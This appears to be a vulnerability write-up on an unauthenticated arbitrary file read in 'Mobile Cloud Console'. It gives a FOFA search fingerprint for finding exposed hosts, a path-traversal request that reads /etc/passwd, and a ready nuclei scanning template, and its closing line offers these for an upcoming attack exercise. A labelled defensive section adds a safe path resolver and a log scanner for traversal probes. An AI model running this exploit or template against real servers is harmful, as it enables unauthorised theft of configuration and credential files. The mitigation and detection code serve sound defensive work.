Arbitrary File Read Vulnerability in Mobile Cloud Console
Application security

Mobile Cloud Console is a system for viewing and managing mobile cloud products and services in one place. It suffers from an arbitrary file read vulnerability: an unauthenticated attacker can read sensitive files from the server, such as web configuration files.
fofa

body="op-login-static/favicon.ico" || header="/oauth2/code/opgateway"

poc

GET /api/query/helpcenter/api/v2/preview?fileName=../../../../../../../../etc/passwd HTTP/1.1
Host: ip
Yaml (nuclei template)

id: cmecloud-console-readfile

info:
  name: cmecloud-console-readfile
  author: onewin
  severity: high
  description: Mobile Cloud Console has arbitrary file reading

http:
  - raw:
      - |+
        @timeout: 30s
        GET /api/query/helpcenter/api/v2/preview?fileName=../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "root"
        part: body
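The following is an added defender-side example, not code from the original post or from the Mobile Cloud Console product. It shows the two things a practitioner wants after reading the above: how a file-preview handler should resolve a user-supplied fileName so that traversal, absolute paths and symlink hops cannot escape the document root, and how to flag traversal attempts against the endpoint named in the write-up in ordinary access logs, including percent-encoded and double-encoded forms. The help-center root directory (HELP_ROOT), the common-log-format layout and the sample log lines are assumptions constructed for the example.

```python
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint taken from the write-up; the document root is a hypothetical value.
PREVIEW_ENDPOINT = "/api/query/helpcenter/api/v2/preview"
HELP_ROOT = "/var/app/helpcenter"  # assumption: where help-center files live


def safe_preview_path(base_dir: str, file_name: str):
    """Resolve file_name under base_dir; return None if the result escapes it.

    realpath() normalises '..' segments and follows symlinks, and the
    commonpath() containment check rejects anything outside base_dir,
    including absolute file names (os.path.join drops base_dir for those).
    """
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, file_name))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable (bounded) so %252e%252e%252f is seen as '../'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


# A '..' path segment, delimited by a slash or backslash or the string ends.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def is_traversal_attempt(request_target: str) -> bool:
    """True when a request to the preview endpoint carries a fileName whose
    decoded value contains a '..' segment."""
    parts = urlsplit(request_target)
    if parts.path != PREVIEW_ENDPOINT:
        return False
    # parse_qs decodes once; decode_fully handles further encoding layers.
    for value in parse_qs(parts.query, keep_blank_values=True).get("fileName", []):
        if TRAVERSAL.search(decode_fully(value)):
            return True
    return False


# Common log format: ip ident user [timestamp] "method target protocol" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def flag_log_lines(lines):
    """Return (client_ip, status, target) for every traversal attempt found.

    A 200 on a flagged line means the server likely served the file and
    the host should be treated as compromised; a 403/404 is a probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_traversal_attempt(m.group("target")):
            hits.append((m.group("ip"), int(m.group("status")), m.group("target")))
    return hits


# Constructed sample traffic (not real logs); IPs and timestamps are made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jul/2024:08:01:02 +0000] "GET /api/query/helpcenter/api/v2/preview?fileName=guide/intro.pdf HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Jul/2024:08:01:09 +0000] "GET /api/query/helpcenter/api/v2/preview?fileName=../../../../../../../../etc/passwd HTTP/1.1" 200 1337',
    '198.51.100.23 - - [10/Jul/2024:08:02:41 +0000] "GET /api/query/helpcenter/api/v2/preview?fileName=..%252f..%252fconf/app.properties HTTP/1.1" 403 0',
    '198.51.100.23 - - [10/Jul/2024:08:03:00 +0000] "GET /op-login-static/favicon.ico HTTP/1.1" 200 318',
]

if __name__ == "__main__":
    print("benign :", safe_preview_path(HELP_ROOT, "guide/intro.pdf"))
    print("blocked:", safe_preview_path(HELP_ROOT, "../../../../../../../../etc/passwd"))
    for ip, status, target in flag_log_lines(SAMPLE_LOG):
        print(f"traversal attempt from {ip} -> HTTP {status}: {target}")
```

The resolver is the mitigation: whatever the application layer does with fileName, the containment check after realpath() is what prevents reading outside the document root. The log scanner is the detection side; it deliberately decodes the parameter more than once so that double-encoded probes, which a single-decode WAF rule misses, still get flagged.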
HVV is about to start, and here come the vulnerabilities. :)